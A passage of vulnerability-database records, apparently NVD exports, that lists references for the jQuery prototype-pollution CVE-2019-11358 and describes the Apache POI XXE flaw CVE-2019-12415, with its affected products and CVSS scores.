], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2019-08", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/108023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/4333", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Third Party Advisory", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2019-006", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2019-08", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-02", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-1321", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2019-10-23 20:15
Modified
2024-11-21 04:22
Severity ?
Summary
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:poi:*:*:*:*:*:*:*:*", matchCriteriaId: "1D82A205-F4BE-4C18-A764-A2364B50BAD9", versionEndIncluding: "4.1.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", matchCriteriaId: "17EA8B91-7634-4636-B647-1049BA7CA088", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5B4DF46F-DBCC-41F2-A260-F83A14838F23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10F17843-32EA-4C31-B65C-F424447BEF7B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_originations:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "7AB8ABFD-C72C-4CBB-8872-9440A19154D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_originations:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "3054FEBB-484B-4927-9D1C-2024772E8B3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_product_manufacturing:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "5AED3C78-7D65-4F02-820D-B51BCE4022F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_product_manufacturing:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "557A23A1-4762-4D29-A478-D1670C1847D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_payments:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "7BE6EB99-98BF-49A2-8890-829320607A1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_payments:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "FD48BA85-B6D3-4BFD-9B48-755494FF094E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "C2BEE49E-A5AA-42D3-B422-460454505480", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*", matchCriteriaId: "F4FF66F7-10C8-4A1C-910A-EF7D12A4284C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "282150FF-C945-4A3E-8A80-E8757A8907EA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", matchCriteriaId: "AB9FC9AB-1070-420F-870E-A5EC43A924A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*", matchCriteriaId: "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B2FDA4C6-68BA-4090-9645-A1A3C526F86C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::8.2.2:*:*:*:*:*:*:*", matchCriteriaId: "00F3F284-E638-495D-89D0-AEB0CCA969CB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: "36E39918-B2D6-43F0-A607-8FD8BFF6F340", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "7582B307-3899-4BBB-B868-BC912A4D0109", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_repository:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F9E13DD9-F456-4802-84AD-A2A1F12FE999", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "40F940AA-05BE-426C-89A3-4098E107D9A7", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6762F207-93C7-4363-B2F9-7A7C6F8AF993", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1B74B912-152D-4F38-9FC1-741D6D0B27FC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "DED59B62-C9BF-4C0E-B351-3884E8441655", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", matchCriteriaId: "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", matchCriteriaId: "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", matchCriteriaId: "7F69B9A5-F21B-4904-9F27-95C0F7A628E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "9A570E5E-A3BC-4E19-BC44-C28D8BC9A537", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0:*:*:*:*:*:*:*", matchCriteriaId: "991B23C1-83FA-40B1-AF0A-9A7B10A9EDA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.2.0:*:*:*:*:*:*:*", matchCriteriaId: "D56B4193-4DB7-4BD9-85FF-8665601E6D4F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "AEDF91E2-E7B5-40EE-B71F-C7D59F4021BD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: "9A94F93C-5828-4D78-9C48-20AC17E72B8E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "F3E25293-CB03-44CE-A8ED-04B3A0487A6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.1.0:*:*:*:*:*:*:*", matchCriteriaId: "4F9721E3-EE25-4C8A-9E0A-E60D465E0A97", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.2.0:*:*:*:*:*:*:*", matchCriteriaId: "E08D8FE6-2BB4-4FF6-8B42-2D47F6FBFDFA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", matchCriteriaId: "C8AF00C6-B97F-414D-A8DF-057E6BFD8597", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*", matchCriteriaId: "2F5647E5-B051-41A6-B186-3584C725908B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:18.8.8.1:*:*:*:*:*:*:*", matchCriteriaId: "4A405B01-7DC5-41A0-9B61-C2DBE1C71A67", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", matchCriteriaId: "10864586-270E-4ACF-BDCC-ECFCD299305F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0:*:*:*:*:*:*:*", matchCriteriaId: "C8109973-AE49-4E2C-B3A0-DDB18674C1FA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", matchCriteriaId: "EE8CF045-09BB-4069-BCEC-496D5AE3B780", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "24A3C819-5151-4543-A5C6-998C9387C8A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "4FB98961-8C99-4490-A6B8-9A5158784F5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "174A6D2E-E42E-4C92-A194-C6A820CD7EF4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, { lang: "es", value: "En Apache POI versiones hasta 4.1.0, cuando se utiliza la herramienta XSSFExportToXml para convertir documentos de Microsoft Excel proporcionados por el usuario, un documento especialmente diseñado puede permitir a un atacante leer archivos del sistema de archivos local o de los recursos de la red interna por medio de un Procesamiento de Entidad Externa XML (XXE).", }, ], id: "CVE-2019-12415", lastModified: "2024-11-21T04:22:47.553", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, exploitabilityScore: 1.8, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-10-23T20:15:12.707", references: [ { source: "security@apache.org", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { source: "security@apache.org", url: 